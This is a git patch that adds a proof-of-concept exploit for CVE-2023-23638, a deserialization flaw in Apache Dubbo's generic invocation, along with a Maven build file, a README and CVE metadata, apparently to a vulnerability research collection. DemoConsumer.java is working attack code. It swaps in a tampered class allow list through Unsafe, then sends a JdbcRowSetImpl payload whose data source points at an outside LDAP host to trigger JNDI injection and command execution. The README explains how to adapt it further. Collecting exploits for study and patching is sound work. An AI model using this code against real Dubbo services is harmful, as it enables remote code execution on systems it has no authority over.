From 7b268e33cd5a6511fd137e0aac69345cf52e7abd Mon Sep 17 00:00:00 2001
From: zeroc <lc13974011998@163.com>
Date: Mon, 10 Apr 2023 10:36:15 +0800
Subject: [PATCH] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2023-23638=E6=BC=8F?=
 =?UTF-8?q?=E6=B4=9EPOC?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .../2023/CVE-2023-23638/README.md             |   7 +
 .../2023/CVE-2023-23638/poc/DemoConsumer.java |  51 ++++++++
 .../2023/CVE-2023-23638/poc/DemoProvider.java |  18 +++
 cve/apache-Dubbo/2023/CVE-2023-23638/pom.xml  | 121 ++++++++++++++++++
 .../2023/yaml/CVE-2023-23638.yaml             |  22 ++++
 openkylin_list.yaml                           |   1 +
 6 files changed, 220 insertions(+)
 create mode 100644 cve/apache-Dubbo/2023/CVE-2023-23638/README.md
 create mode 100644 cve/apache-Dubbo/2023/CVE-2023-23638/poc/DemoConsumer.java
 create mode 100644 cve/apache-Dubbo/2023/CVE-2023-23638/poc/DemoProvider.java
 create mode 100644 cve/apache-Dubbo/2023/CVE-2023-23638/pom.xml
 create mode 100644 cve/apache-Dubbo/2023/yaml/CVE-2023-23638.yaml

diff --git a/cve/apache-Dubbo/2023/CVE-2023-23638/README.md b/cve/apache-Dubbo/2023/CVE-2023-23638/README.md
new file mode 100644
index 00000000..f267cc7b
--- /dev/null
+++ b/cve/apache-Dubbo/2023/CVE-2023-23638/README.md
@@ -0,0 +1,7 @@
+# CVE-2023-23638
+
+dubbo泛型调用存在反序列化漏洞，可导致恶意代码执行。该问题影响Apache Dubbo 2.7.x 2.7.21及之前版本； Apache Dubbo 3.0.x 版本 3.0.13 及之前版本； Apache Dubbo 3.1.x 版本 3.1.5 及之前的版本。
+
+复现时需要为 DemoComsumer 添加 VM 参数: `-Ddubbo.hessian.allowNonSerializable=true`, 详情参考 https://su18.org/post/hessian/#serializable
+
+POC 的本质是利用某个 class 修改 properties 以绕过限制, 代码给的是 JNDI 注入, 可以参考 [CVE-2023-23638 Apache Dubbo JavaNative反序列化漏洞分析](https://mp.weixin.qq.com/s?__biz=Mzg3OTcyNjM1MQ==&mid=2247483788&idx=1&sn=7954ad20fec203469a13a09050536a1c) 自行修改成反序列化的利用方式
diff --git a/cve/apache-Dubbo/2023/CVE-2023-23638/poc/DemoConsumer.java b/cve/apache-Dubbo/2023/CVE-2023-23638/poc/DemoConsumer.java
new file mode 100644
index 00000000..6349f728
--- /dev/null
+++ b/cve/apache-Dubbo/2023/CVE-2023-23638/poc/DemoConsumer.java
@@ -0,0 +1,51 @@
+package org.apache.dubbo.samples;
+
+import org.apache.dubbo.common.utils.ConcurrentHashSet;
+import org.apache.dubbo.common.utils.SerializeClassChecker;
+import org.apache.dubbo.rpc.service.GenericService;
+import org.springframework.context.support.ClassPathXmlApplicationContext;
+import sun.misc.Unsafe;
+
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Field;
+import java.util.*;
+
+public class DemoConsumer {
+    public static void main(String[] args) throws Exception {
+        ClassPathXmlApplicationContext context = new ClassPathXmlApplicationContext("spring/generic-type-consumer.xml");
+        context.start();
+
+        Constructor<Unsafe> constructor = Unsafe.class.getDeclaredConstructor();
+        constructor.setAccessible(true);
+        Unsafe unsafe = constructor.newInstance();
+
+        Set<String> allowSet = new ConcurrentHashSet<>();
+        allowSet.add("com.sun.rowset.JdbcRowSetImpl".toLowerCase());
+
+        SerializeClassChecker serializeClassChecker = (SerializeClassChecker) unsafe.allocateInstance(SerializeClassChecker.class);
+        Field f = SerializeClassChecker.class.getDeclaredField("CLASS_DESERIALIZE_ALLOWED_SET");
+        f.setAccessible(true);
+        f.set(serializeClassChecker, allowSet);
+
+//        SerializeClassChecker serializeClassChecker = (SerializeClassChecker) unsafe.allocateInstance(SerializeClassChecker.class);
+//        Field f = SerializeClassChecker.class.getDeclaredField("CLASS_DESERIALIZE_BLOCKED_SET");
+//        f.setAccessible(true);
+//        f.set(serializeClassChecker, new ConcurrentHashSet<>());
+
+        Map<Object, Object> map1 = new HashMap<>();
+        map1.put("class", "org.apache.dubbo.common.utils.SerializeClassChecker");
+        map1.put("INSTANCE", serializeClassChecker);
+
+        Map<Object, Object> map2 = new LinkedHashMap<>();
+        map2.put("class", "com.sun.rowset.JdbcRowSetImpl");
+        map2.put("dataSourceName", "ldap://192.168.100.1:1389/Basic/Command/calc");
+        map2.put("autoCommit", true);
+
+        List list = new LinkedList();
+        list.add(map1);
+        list.add(map2);
+
+        GenericService genericService = (GenericService) context.getBean("helloService");
+        genericService.$invoke("sayHello", new String[]{"java.lang.String"}, new Object[]{list});
+    }
+}
diff --git a/cve/apache-Dubbo/2023/CVE-2023-23638/poc/DemoProvider.java b/cve/apache-Dubbo/2023/CVE-2023-23638/poc/DemoProvider.java
new file mode 100644
index 00000000..bc872532
--- /dev/null
+++ b/cve/apache-Dubbo/2023/CVE-2023-23638/poc/DemoProvider.java
@@ -0,0 +1,18 @@
+package org.apache.dubbo.samples;
+
+import org.springframework.context.support.ClassPathXmlApplicationContext;
+
+import java.util.concurrent.CountDownLatch;
+
+public class DemoProvider {
+
+    public static void main(String[] args) throws Exception {
+
+        ClassPathXmlApplicationContext context = new ClassPathXmlApplicationContext("spring/generic-type-provider.xml");
+        context.start();
+
+        System.out.println("dubbo service started");
+        new CountDownLatch(1).await();
+    }
+
+}
diff --git a/cve/apache-Dubbo/2023/CVE-2023-23638/pom.xml b/cve/apache-Dubbo/2023/CVE-2023-23638/pom.xml
new file mode 100644
index 00000000..63f4db38
--- /dev/null
+++ b/cve/apache-Dubbo/2023/CVE-2023-23638/pom.xml
@@ -0,0 +1,121 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!--
+  ~
+  ~   Licensed to the Apache Software Foundation (ASF) under one or more
+  ~   contributor license agreements.  See the NOTICE file distributed with
+  ~   this work for additional information regarding copyright ownership.
+  ~   The ASF licenses this file to You under the Apache License, Version 2.0
+  ~   (the "License"); you may not use this file except in compliance with
+  ~   the License.  You may obtain a copy of the License at
+  ~
+  ~       http://www.apache.org/licenses/LICENSE-2.0
+  ~
+  ~   Unless required by applicable law or agreed to in writing, software
+  ~   distributed under the License is distributed on an "AS IS" BASIS,
+  ~   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  ~   See the License for the specific language governing permissions and
+  ~   limitations under the License.
+  ~
+  -->
+
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+
+    <artifactId>dubbo-samples-test</artifactId>
+    <groupId>org.apache.dubbo.samples</groupId>
+    <version>1.0-SNAPSHOT</version>
+
+    <properties>
+        <source.level>1.8</source.level>
+        <target.level>1.8</target.level>
+        <dubbo.version>3.1.5</dubbo.version>
+<!--        <dubbo.version>2.7.21</dubbo.version>-->
+<!--        <dubbo.version>3.0.13</dubbo.version>-->
+        <spring.version>4.3.3.RELEASE</spring.version>
+        <junit.version>4.13.1</junit.version>
+        <maven-compiler-plugin.version>3.7.0</maven-compiler-plugin.version>
+    </properties>
+
+    <dependencyManagement>
+        <dependencies>
+            <dependency>
+                <groupId>org.springframework</groupId>
+                <artifactId>spring-framework-bom</artifactId>
+                <version>${spring.version}</version>
+                <type>pom</type>
+                <scope>import</scope>
+            </dependency>
+            <dependency>
+                <groupId>org.apache.dubbo</groupId>
+                <artifactId>dubbo-bom</artifactId>
+                <version>${dubbo.version}</version>
+                <type>pom</type>
+                <scope>import</scope>
+            </dependency>
+            <dependency>
+                <groupId>org.apache.dubbo</groupId>
+                <artifactId>dubbo-dependencies-zookeeper</artifactId>
+                <version>${dubbo.version}</version>
+                <type>pom</type>
+            </dependency>
+            <dependency>
+                <groupId>junit</groupId>
+                <artifactId>junit</artifactId>
+                <version>${junit.version}</version>
+                <scope>test</scope>
+            </dependency>
+
+            <dependency>
+                <groupId>org.springframework</groupId>
+                <artifactId>spring-test</artifactId>
+                <scope>test</scope>
+            </dependency>
+        </dependencies>
+    </dependencyManagement>
+
+    <dependencies>
+        <dependency>
+            <groupId>org.apache.dubbo</groupId>
+            <artifactId>dubbo</artifactId>
+        </dependency>
+
+        <dependency>
+            <groupId>org.apache.dubbo</groupId>
+            <artifactId>dubbo-dependencies-zookeeper</artifactId>
+            <type>pom</type>
+        </dependency>
+    </dependencies>
+
+    <build>
+        <plugins>
+            <plugin>
+                <groupId>org.apache.maven.plugins</groupId>
+                <artifactId>maven-compiler-plugin</artifactId>
+                <version>${maven-compiler-plugin.version}</version>
+                <configuration>
+                    <source>${source.level}</source>
+                    <target>${target.level}</target>
+                </configuration>
+            </plugin>
+            <plugin>
+                <groupId>org.springframework.boot</groupId>
+                <artifactId>spring-boot-maven-plugin</artifactId>
+                <executions>
+                    <execution>
+                        <goals>
+                            <goal>repackage</goal>
+                        </goals>
+                        <configuration>
+                            <classifier>spring-boot</classifier>
+                            <mainClass>
+                                org.apache.dubbo.samples.DemoConsumer
+                            </mainClass>
+                        </configuration>
+                    </execution>
+                </executions>
+            </plugin>
+        </plugins>
+    </build>
+</project>
diff --git a/cve/apache-Dubbo/2023/yaml/CVE-2023-23638.yaml b/cve/apache-Dubbo/2023/yaml/CVE-2023-23638.yaml
new file mode 100644
index 00000000..01126780
--- /dev/null
+++ b/cve/apache-Dubbo/2023/yaml/CVE-2023-23638.yaml
@@ -0,0 +1,22 @@
+id: CVE-2023-23638
+source: https://github.com/X1r0z/CVE-2023-23638
+info:
+  name: Apache Dubbo是一款 RPC 服务开发框架，用于解决微服务架构下的服务治理与通信问题
+  severity: CRITICAL
+  description: |
+    Dubbo是一个高性能优秀的服务框架。CVE-2023-23638中，Dubbo泛型调用存在反序列化漏洞，可导致恶意代码执行。
+  scope-of-influence: 
+    Dubbo 2.7.0 - 2.7.21
+    Dubbo 3.0.0 - 3.0.13
+    Dubbo 3.1.0 - 3.1.5
+  reference: 
+    - https://exp10it.cn/2023/03/apache-dubbo-cve-2023-23638-%E5%88%86%E6%9E%90/
+    - https://mp.weixin.qq.com/s?__biz=Mzg3OTcyNjM1MQ==&mid=2247483788&idx=1&sn=7954ad20fec203469a13a09050536a1c
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-23638
+    cwe-id: CWE-502
+    cnvd-id: None
+    kve-id: None
+  tags: Apache Dubbo, Deserialization vulnerability when generic invoke
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index ce103e6a..3051c951 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -11,6 +11,7 @@ cve:
     - CVE-2020-13932
   apache-CouchDB:
     - CVE-2022-24706
+    - CVE-2023-23638
   apache-Dubbo:
     - CVE-2021-43297
     - CVE-2021-25641 
-- 
Gitee